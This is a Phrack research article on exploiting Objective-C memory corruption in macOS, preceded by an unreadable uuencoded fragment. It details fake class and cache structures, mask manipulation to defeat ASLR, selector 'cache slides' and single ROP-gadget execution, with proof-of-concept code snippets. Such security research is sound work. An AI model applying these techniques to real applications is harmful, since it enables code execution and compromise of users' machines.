M.F$])JZTR15AM]FT;1I>;BB?JVBS5NLH@SG>J1V)`[\IB20PV^'CD?AEJ\L'
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
-`__Q=R13A0D""*>+4```
`
end


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straight forward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.
Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn
the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only build
on the techniques covered in the original [1]. Contrary to the beliefs of
Ian Beer, the techniques in the original paper are still alive and kicking
in modern times however some adjustment is needed depending on the context
of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call.
When Objective-C objects are allocated, storage for their instance
variables is allocated on the native heap with malloc(). The first element
in this space is a pointer to the class definition in the binary. This is
typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A'
NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an Objective-C
method call to be performed on an attacker controlled memory location.
This can occur when dealing with Use-After-Free conditions, heap overflows
into objective-c objects, and even format bugs using the %@ format string
character.

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it's finished looking through the entire
cache and found no match for the SEL value passed in. In which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer however, and adds
little benefit. But i digress, both of these methods are still completely
valid in the most current version of Mac OS X at this time Mavericks,
(10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is due to the fact
that even with direct control of EIP modern NX and ASLR makes it difficult
to know a reliable absolute location in which we can store a payload and
return to execute it.

From what i've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps
and turn a dangling Objective-C method call into both an information leak
and execution control.

In order to use this technique, we must first know the exact binary version
in use on the target. Thankfully on Mac OS X this is usually pretty easy as
automatic updates mean that most people are running the same binary
version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct.

Since we are already familiar with 32-bit internals, we will begin our
investigation of dangling objc_msgSend() exploitation with the 32-bit
runtime, before moving on to look at the changes in the new run-time on
64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared-region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which are
commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within. The order in which each library is added to this file is
randomized, therefore the offset into the file for a particular library
cannot be relied on. Reading the file
'/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files.

For 32-bit processes, this file is mapped at the fixed address 0x90000000.
At this location there is a structure which described the contents of the
shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

        [leakme.m]

        #import "leakme.h"

        @implementation leakme
        -(void) log
        {
            printf("lol\n");
        }
        @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the objects address, before converting
it back with atol(). This is pretty confusing, but it's basically an easy
way to trick the compiler into giving us a void pointer to the object. Type
casting the object pointer directly will not compile with gcc.

        printf("[+] Class @ 0x%lx\n",l);
        sprintf(num,"%li",l);
        long *ptr = atol(num);
        ...
        printf("[+] Overwriting object\n");
        *ptr = &fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

- Using a leak to read a pointer out of memory.
- Abusing language weaknesses to infer an address. [2]
- Abuse the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.

As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

        struct fakecache {
            char pad[0x20];
            long cache_ptr;
        };

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from it's address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used. Rather than
iterating through every pointer to find the appropriate cache entry each
time however, a mask is applied to the selector pointer. The masked off
bits are then shifted and used as an index into the cache table entry
pointer array. Then after this index is used, each entry is inspected.
This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask provides
us with the mechanism we need to create a leak.

Ok, so going back to the mask. In my original Objective-C paper, we set the
mask to 0. This forced the runtime to look directly past the mask
regardless of what value the SEL had. In this case however, we want to
abuse the mask in order to isolate the "randomized" unpredictable bits in
the selector pointer value (SEL).

Below, we can see a "real" SEL value from a 10.10 system, which is located
in the shared_region.

        (lldb) x/s $ecx
        0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000 we know that
first octet will always be 0x9. We also know that the offset into the page
which contains the SEL will always be the same, therefore the last 3
octets 0x86e will be the same for the binary version we retrieve the SEL
value from. However, we cannot count on the rest of the SEL value being the
same on the system we are running our exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

          9   0    f    3    f     8    6   e
        1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed the mask which would retrieve the bits we
care about looks as follows:

         0    f    f     f   f     0   0    0
        0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 to the right prior to
applying the mask, we must shift our mask to account for this.

This leaves us with:

         0    3    f    f    f    c    0    0
        0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

        index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

        index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide, containing all
permutations of slide, we can make sure that this location contains the
right value for slide.

In the 32-bit runtime (the old runtime) the cache index is used to retrieve
a pointer to a cache_entry from an array of pointers. (buckets).
In our example code (main.m) we set the buckets array up as follows:

        long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the buckets pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

        struct cacheentry {
                long sel;
                long pad;
                long eip;
        };


Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base.
This way the appropriate SEL is guaranteed to match after the mask is
applied and used to index the table.

For the EIP value, we can utilize the fact that the string table containing
the SEL string is always going to be relative to the .text segment within
the same binary. The diagram below shows this more clearly.

        ,_______________,<--- Mach-O base address
        |               |
        | mach-o header |
        +---------------+
        |               |<--- SEL in string table, relative to base
        | string table  |    /\ Relative offset
        +---------------+    \/ from SEL to ROP gadgets
        |               |<--- ROP gadget in .text segment
        | .text segment |
        '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way i know
to calculate these values is to break on the objc_msgSend function and dump
the current SEL value. In lldb this is simple a case of using "reg read
ecx". Next, "target module list -a $ecx" provides us with the module base.
By subtracting the absolute SEL address from the module base we can get the
relative offset within the module. This can be repeated for the gadget
address within the same module. Next, when populating the table, we simple
need to add these two relative offsets to our potential module base
candidate. We increment the module base candidate for each entry in the
table.

By populating our cache slide in this way we are guaranteed the execution
of a single ROP gadget within the module that our SEL is in. This can be
enough for us to succeed. We will look into ways to use this construct
later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide which we need to generate we need to
look at the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

10010000 00000000 10000000 00000000 :: SR START -- 0x90008000
10011100 00111001 00010000 00000000 :: SR END   -- 0x9C391000

00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we compare this to the unshifted mask, and mask off the bits we care
about we get the following values for our potential index values.

00000000 00000000 00100000 00000000  -- smallest index value - 0x2000
00000011 00001110 01000100 00000000  -- biggest  index value - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiple the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of the
cache entry array is 0x24ab3000.

By adding these two values together we get the total size of our cache
slide, 0x30e44000 bytes.

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.

----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in by
the linker when an executable is loaded that requires them as a dependency.

The location of these modules is always relative to the end of the
executable file and is loaded in the order specified in the LC_LOAD_DYLIB
header.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

        uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) +
            slide;

The slide value is calculated by the kernel and then passed to the main
function of the dynamic loader. The following algorithm is responsible for
generating the slide value.

        aslr_offset = (unsigned int)random();
        max_slide_pages = vm_map_get_max_aslr_slide_pages(map);
        aslr_offset %= max_slide_pages;
        aslr_offset <<= vm_map_page_shift(map);

where:

        uint64_t
        vm_map_get_max_aslr_slide_pages(vm_map_t map)
        {
                return (1 << (vm_map_is_64bit(map) ? 16 : 8));
        }


        int
        vm_map_page_shift(
                vm_map_t map)
        {
                return VM_MAP_PAGE_SHIFT(map);
        }

        #define VM_MAP_PAGE_SHIFT(map) \
            ((map) ? (map)->hdr.page_shift : PAGE_SHIFT)
        #define PAGE_SHIFT I386_PGSHIFT
        #define I386_PGSHIFT 12

So for example, a random() value of 0xdeadbeef, would end up as the value
0xef000. With the following calculation:

        slide = ((0xdeadbeef % (1<<8)) << 12)
        slide = 0xef000

The gcc compiler and llvm both (by default) use a load address of 0x1000
for the text section of an executable. So for the slide value 0xef000 the
executable file would be based at 0x1000 + 0xef000 = 0xf0000.

This means that for the most part, you're dealing with roughly 1 byte of
unpredictable bits. Depending on the number of libraries loaded which are
outside of the shared region, this fluctuates, however libraries are always
loaded in the order stipulated by the executable itself, so this is fairly
predictable.

For our dangling objc_msgSend technique this means that our mask fluctuates
depending on the target. In the best case, masking of the single byte in
the address can be achieved by using the mask (0x000ff000 >> 2) == 0x3fc00.

--[ 64-bit dangling objc_msgSend()

The 64-bit version of this technique is quite different to it's 32-bit
brethren. This is mostly due to the fact that 64-bit processes use a
brethren. This is mostly due to the fact that 64-bit processes use a
whole new version of the runtime.

In the new runtime, the objc_class structure is no longer a basic C
structure. Instead it uses C++ intrinsics to include methods.

The memory footprint for the new class is shown below.

struct objc_class : objc_object {
    // Class ISA;
    Class superclass;
    cache_t cache;             // formerly cache pointer and vtable
    class_data_bits_t bits;    // class_rw_t * plus custom rr/alloc flags
...
}

The cache_t struct looks as follows:

struct cache_t {
    struct bucket_t *_buckets;
    mask_t _mask;
    mask_t _occupied;
...
}

and a bucket_t struct looks like:

struct bucket_t {
private:
    cache_key_t _key;
    IMP _imp;
...
}

Putting this together. The main thing that has changed regarding the cache
lookup, rather than an array of pointers to cache entries, there is simply
a single pointer to an array of SEL + method address entries at offset 0x10
into the structure. Following this, there's the mask, followed by an
occupied field indicating that entries in the cache exist.

The critical difference in the run-time is the way the mask is used to
index into this table. Rather than the (SEL >> 2) value in the 32-bit
runtime, the index is calculated via ((SEL & mask) << 4). This means, if we
were to abuse the mask in a similar way to the 32-bit technique we would
need a mask of 0xffff0000 in order to isolate the randomized bits.
Obviously even if we were able to make an allocation big enough to contain
the cache slide necessary for this it would be such a time consuming act to
populate 4gb worth of cache entries to catch the index that this is not
really a feasible process.

Instead we must utilize an additional characteristic of the new runtime.
The objc_msgSend() call at a high level looks as follows:

        ISA = *class_ptr;
        offset = ((SEL & ISA->mask) << 4);

        while(ISA->buckets[offset].SEL != 0) {
                if(ISA->buckets[offset].SEL == SEL) {
                        return ISA->buckets[offset].method(args);
                } else {
                        offset--;
                        continue;
                }
        }

This means that if we once again create a large slide containing entries
for all possible randomized bits, we simply need to point (using the index
we control) the runtime to end of our slide, and let it walk backwards
until it finds a match.

----[ 64-bit Shared Region

In order to investigate this technique, we will begin again by looking at
the shared region on 64-bit processes. The shared region starts at the
address 0x7FFF80000000. Once again a cache file is mapped in, this time
from /var/db/dyld/dyld_shared_cache_x86_64. This file is, once again,
randomized upon creation, however in 64-bit processes there is also a
random slide added to the file when it is mapped in. This is calculated
using sizeof(shared_region) - sizeof(cache file) as the max. As far as our
technique goes however this does not really change very much.

Calculating the mask value for this technique can be challenging. There are
a few constraints which we must work against in order to index our bucket
list to the last entry.

To investigate this we will take a typical SEL value 0x00007fff99f88447
The bit pattern is broke down below.

SEL:
 0x00       00       7f       ff       99       f8       84       47
00000000 00000000 01111111 11111111 10011001 11111000 10000100 01000111

Unfortunately the mask variable is only 4 bytes long. This means that the
predictable bits in the upper 32-bits of the SEL are not available to us.
Also, the last 12 static bits (offset into page - 0x447) would result in an
index that is too small. If we used those bits we would not have a large
enough offset to index to the end of the slide. Luckily, we have one single
static bit in position 33 which we can count on being set. We can take
advantage of this bit with the following mask.

Mask:
 0x00       00       00       00       80       00       00       00
00000000 00000000 00000000 00000000 10000000 00000000 00000000 00000000

Applying this bit to any SEL value within the shared region will guarantee
the offset 0x80000000. Clearly this value is way beyond the end of our
required slide, however since we also control the pointer to the bucket
slide, we can subtract (0x80000000 - sizeof(cache)) from the pointer value
to force it to point to the right location.

The example code main64.m demonstrates this technique. In this code, we use
a fakecache structure to control the initial cache lookup. A pad is used to
correctly position the bucket pointer and mask.

        struct fakecache {
           char pad[0x10];
           long bucketptr;
           long mask;
        };

Next, we allocate an array of cache entry structs in order to hold our SEL
slide. Obviously in a real attack all these elements would be in a single
allocation, however for this example we will split them up for clarity.

        struct cacheentry {
                long sel;
                long rip;
        };

        struct cacheentry *buckets = malloc((NUMBUCKETS+1) * sizeof(struct
        cacheentry));

Initializing each of these elements is simply a case of incrementing the
random value added to the SEL each time, and populating each entry.

Again, the RIP value is calculated by adding a relative offset to the SEL
in order to locate our ROP gadget.

        for(slide = 0; slide < NUMBUCKETS ; slide++) {
                buckets[slide].sel = BASESEL + (slide * 0x1000);
                buckets[slide].rip = buckets[slide].sel - 75654446;
        }

----[ Uncommon 64-bit Libraries

Once again, libraries which are not within the shared region are mapped
directly after the executable image in memory. Typically the text segment
address generated by the compiler is 0x100000000.

The same code is used to to generate the slide that we looked at earlier in
the 32-bit section. Here is an example of a slide for a 64-bit process with
the random() value of 0xdeadbeef.

        slide         = ((0xdeadbeef % (1<<16)) << 12)
        slide         = 0xbeef000
        example SEL   = 0x10beef447

As you can see, in this example, there is no predictable bit in the lower
32-bits of the SEL which we can rely on to index to the end of our table.
Our only option here is to utilize the random bits in the SEL. We can do
this by repeating the entire spectrum of randomized values in our slide
multiple times. This way depending on the value of the random bits a
different offset will occur into the slide, however in most scenarios it
will result in finding one instance of the correct entry.

--[ Single Gadget Exploitation Strategies

Now that we've looked at how to get execution to a predictable location of
our choice, the next step is to look at some ways to utilize this to our
advantage.

Obviously there is an abundance of ways that this can be utilized, but the
following 3 methods are ways that I have seen succeed in real life.

----[ Return SEL Gadget

At the moment when we gain execution control using this technique a
register value contains the SEL pointer value. We can use this fact to our
advantage. For example, for 32-bit code, the following gadget could take
advantage of this.

                00000000  89C8              mov eax,ecx
                00000002  5E                pop esi
                00000003  5D                pop ebp
                00000004  C3                ret

The gadget above moves the SEL pointer value into the eax register,
obviously on function return this register is treated as the return value.
Next it restores EBP from the stack and uses the ret instruction to return
from the function. This results in, rather than the expected return value
for whatever Objective-C method was dangling, the SEL value is returned.

